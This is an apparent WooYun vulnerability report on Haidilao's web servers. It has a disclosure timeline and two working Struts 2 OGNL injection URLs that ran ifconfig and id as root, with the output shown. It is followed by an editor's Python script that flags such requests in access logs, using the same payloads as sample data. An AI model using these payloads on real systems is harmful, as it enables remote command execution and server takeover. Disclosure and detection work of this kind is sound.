WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2013-08-01: Details reported to the vendor, awaiting vendor handling
2013-08-02: Vendor confirmed; details visible to the vendor only
2013-08-12: Details opened to core white hats and relevant domain experts
2013-08-22: Details opened to regular white hats
2013-09-01: Details opened to intern white hats
2013-09-15: Details opened to the public
Haidilao: two remote command execution vulnerabilities (root), shell obtainable
1#
http://cater.haidilao.com/Cater/store/liststore.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'ifconfig'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
ROOT
ifconfig
eth0      Link encap:Ethernet  HWaddr 70:7B:E8:EC:5C:C4
          inet addr:172.16.253.15  Bcast:172.16.253.255  Mask:255.255.255.0
          inet6 addr: fe80::727b:e8ff:feec:5cc4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1243550800 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1365869516 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:644931179046 (615054.3 Mb)  TX bytes:1034817341356 (986878.7 Mb)
          Interrupt:58

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:903 errors:0 dropped:0 overruns:0 frame:0
          TX packets:903 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:58063 (56.7 Kb)  TX bytes:58063 (56.7 Kb)
2#
http://vae.haidilao.com:8680/ecitySSO/sso/beforeLogin.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
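Both PoC URLs above inject an OGNL expression through the Struts 2 `redirect:` parameter prefix and run a command via `java.lang.ProcessBuilder`, writing its output straight into the HTTP response. That is the shape of the Struts 2 prefix-parameter bug S2-016 (fixed in Struts 2.3.15.1); the identification is the editor's, since the report itself does not name the underlying bug. As an added example, not part of the original report, the Python script below decodes access-log request lines and flags that pattern, reporting the prefix used, the OGNL markers found and the command array handed to ProcessBuilder. The log lines are constructed for illustration (they reuse the two request targets from this page plus one benign hit); the prefix list and the marker regex are the editor's assumptions and generalize beyond this page by also covering the `redirectAction:` and `action:` prefixes and bare `%{...}` expressions in ordinary parameters.

```python
"""Added example (not from the original report): flag Struts 2 prefix-parameter
OGNL injection attempts, such as the two "redirect:${...}" PoC URLs above,
in web-server access logs. The log lines below are constructed."""
import re
from urllib.parse import unquote

# Parameter-name prefixes interpreted by Struts 2's DefaultActionMapper; the
# PoCs above abuse "redirect:". The other two are an editor's assumption so the
# check generalizes beyond this page.
DANGEROUS_PREFIXES = ("redirect:", "redirectAction:", "action:")

# Markers of an OGNL expression plus the command-execution gadgets seen above.
OGNL_MARKERS = re.compile(
    r"[$%]\{|#context\b|#_memberAccess|ProcessBuilder|java\.lang\.Runtime",
    re.IGNORECASE,
)
# The String[] literal handed to ProcessBuilder, e.g. {'ifconfig'}.
COMMAND_ARGS = re.compile(r"String\[\]\s*\{([^}]*)\}")

# Common/combined log format: client, timestamp, request line, status code.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def split_query(target):
    """Return percent-decoded (name, value) pairs from a request target.
    Split by hand rather than with parse_qsl so a payload with no '=' at all
    (as in both PoCs) still surfaces as a parameter name."""
    if "?" not in target:
        return []
    pairs = []
    for part in target.split("?", 1)[1].split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote(name), unquote(value)))
    return pairs


def inspect_target(target):
    """Return a finding for the first suspicious parameter, or None."""
    for name, value in split_query(target):
        lowered = name.lower()
        prefix = next((p for p in DANGEROUS_PREFIXES if lowered.startswith(p.lower())), None)
        expression = name if not value else name + "=" + value
        markers = sorted({m.group(0) for m in OGNL_MARKERS.finditer(expression)})
        if prefix and markers:
            severity = "high"      # prefix plus OGNL: the pattern used above
        elif markers:
            severity = "medium"    # OGNL inside an ordinary parameter
        elif prefix:
            severity = "low"       # prefix feature used without an expression
        else:
            continue
        cmd = COMMAND_ARGS.search(expression)
        command = [a.strip().strip("'\"") for a in cmd.group(1).split(",")] if cmd else None
        return {"severity": severity, "prefix": prefix, "markers": markers,
                "command": command, "expression": expression[:100]}
    return None


def scan_log(lines):
    """Parse access-log lines and return one alert per injection attempt."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                     # not an access-log line we understand
        finding = inspect_target(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            alerts.append(finding)
    return alerts


# Constructed sample log: the two PoC request targets from this report plus one benign hit.
SAMPLE_LOG = [
    "172.16.0.9 - - [01/Aug/2013:10:12:31 +0800] \"GET /Cater/store/liststore.action?"
    "redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'ifconfig'})).start(),"
    "%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),"
    "%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),"
    "%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),"
    "%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
    " HTTP/1.1\" 200 1833 \"-\" \"Mozilla/5.0\"",
    "172.16.0.9 - - [01/Aug/2013:10:14:02 +0800] \"GET /ecitySSO/sso/beforeLogin.action?"
    "redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'id'})).start(),"
    "%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),"
    "%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),"
    "%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),"
    "%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}"
    " HTTP/1.1\" 200 96 \"-\" \"Mozilla/5.0\"",
    "10.0.0.5 - - [01/Aug/2013:10:15:40 +0800] \"GET /Cater/store/liststore.action?storeId=12&page=2"
    " HTTP/1.1\" 200 5120 \"-\" \"Mozilla/5.0\"",
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['severity']:<6} {a['ip']} [{a['ts']}] prefix={a['prefix']} "
              f"command={a['command']} markers={a['markers']}")
```

Run over the sample log the script reports two high-severity hits from 172.16.0.9, one running `ifconfig` and one running `id`, and ignores the benign store listing. A `redirect:` parameter without any OGNL marker is reported at low severity only, because the prefix by itself was a legitimate Struts feature before it was removed; it is the combination with an expression that matches the PoCs above.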
Not investigated further.
Patch
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-08-02 09:58
None yet